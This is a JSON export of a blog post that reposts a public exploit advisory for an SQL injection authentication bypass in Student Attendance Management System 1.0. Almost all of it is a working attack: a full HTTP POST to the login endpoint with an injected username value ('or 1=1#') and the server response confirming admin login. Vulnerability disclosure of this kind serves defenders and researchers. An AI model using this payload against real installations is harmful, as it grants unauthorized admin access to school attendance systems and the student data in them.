{"id":57668,"date":"2024-06-24T17:30:13","date_gmt":"2024-06-24T14:30:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179190\/studentams10-sql.txt"},"modified":"2024-06-24T17:30:13","modified_gmt":"2024-06-24T14:30:13","slug":"student-attendance-management-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/student-attendance-management-system-1-0-sql-injection\/","title":{"rendered":"Student Attendance Management System 1.0 SQL Injection"},"content":{"rendered":"<p>## Titles: Student Attendance Management System-1.0 Bypass Authentication<br \/>SQLi<br \/>## Author: nu11secur1ty<br \/>## Date: 06\/22\/2024<br \/>## Vendor: https:\/\/github.com\/oretnom23<br \/>## Software:<br \/>https:\/\/www.sourcecodester.com\/php\/14561\/student-attendance-management-system-using-phpmysqli-source-code.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<p>## Description:<br \/>The username parameter is not sanitizing well, the attacker can inject<br \/>direct queries into the login form and easily bypass the authentication of<br \/>the admin account.<\/p>\n<p>STATUS: CRITICAL- Vulnerability<\/p>\n[+]Exploits:<br \/>&#8211; Exploit:<br \/>&#8220;`POST<br \/>POST \/student_attendance\/ajax.php?action=login HTTP\/1.1<br \/>Host: pwnedhost.com<br \/>Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4<br \/>Content-Length: 104<br \/>Sec-Ch-Ua: &#8220;Not\/A)Brand&#8221;;v=&#8221;8&#8243;, &#8220;Chromium&#8221;;v=&#8221;126&#8243;<br \/>Accept-Language: en-US<br \/>Sec-Ch-Ua-Mobile: ?0<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36<br \/>(KHTML, like Gecko) Chrome\/126.0.6478.57 Safari\/537.36<br \/>Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>Accept: *\/*<br \/>X-Requested-With: XMLHttpRequest<br \/>Sec-Ch-Ua-Platform: &#8220;Windows&#8221;<br \/>Origin: https:\/\/pwnedhost.com<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: cors<br \/>Sec-Fetch-Dest: empty<br \/>Referer: https:\/\/pwnedhost.com\/student_attendance\/login.php<br \/>Accept-Encoding: gzip, deflate, br<br \/>Priority: u=1, i<br \/>Connection: keep-alive<\/p>\n<p>username=nu11secur1ty&#8217;+or+1%3D1%23&amp;password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid<br \/>&#8220;`<\/p>\n[+]Response<br \/>&#8220;`HTTP<br \/>HTTP\/1.1 200 OK<br \/>Date: Sat, 22 Jun 2024 06:37:41 GMT<br \/>Server: Apache\/2.4.56 (Win64) OpenSSL\/1.1.1t PHP\/8.2.4<br \/>X-Powered-By: PHP\/8.2.4<br \/>Expires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>Cache-Control: no-store, no-cache, must-revalidate<br \/>Pragma: no-cache<br \/>Content-Length: 1<br \/>Keep-Alive: timeout=5, max=100<br \/>Connection: Keep-Alive<br \/>Content-Type: text\/html; charset=UTF-8<\/p>\n<p>1<br \/>&#8220;`<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/www.patreon.com\/posts\/student-system-1-106665723)<\/p>\n<p>## Proof and Exploit:<br \/>[href](https:\/\/www.patreon.com\/posts\/student-system-1-106665723)<\/p>\n<p>## Time spent:<br \/>01:25:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Titles: Student Attendance Management System-1.0 Bypass AuthenticationSQLi## Author: nu11secur1ty## Date: 06\/22\/2024## Vendor: https:\/\/github.com\/oretnom23## Software:https:\/\/www.sourcecodester.com\/php\/14561\/student-attendance-management-system-using-phpmysqli-source-code.html## Reference: https:\/\/portswigger.net\/web-security\/sql-injection ## Description:The username parameter is not sanitizing well, the attacker can injectdirect queries into the login form and easily bypass the authentication ofthe admin account. STATUS: CRITICAL- Vulnerability [+]Exploits:&#8211; Exploit:&#8220;`POSTPOST \/student_attendance\/ajax.php?action=login HTTP\/1.1Host: pwnedhost.comCookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4Content-Length: 104Sec-Ch-Ua: &#8220;Not\/A)Brand&#8221;;v=&#8221;8&#8243;, &#8220;Chromium&#8221;;v=&#8221;126&#8243;Accept-Language: en-USSec-Ch-Ua-Mobile: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57668","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57668"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57668\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}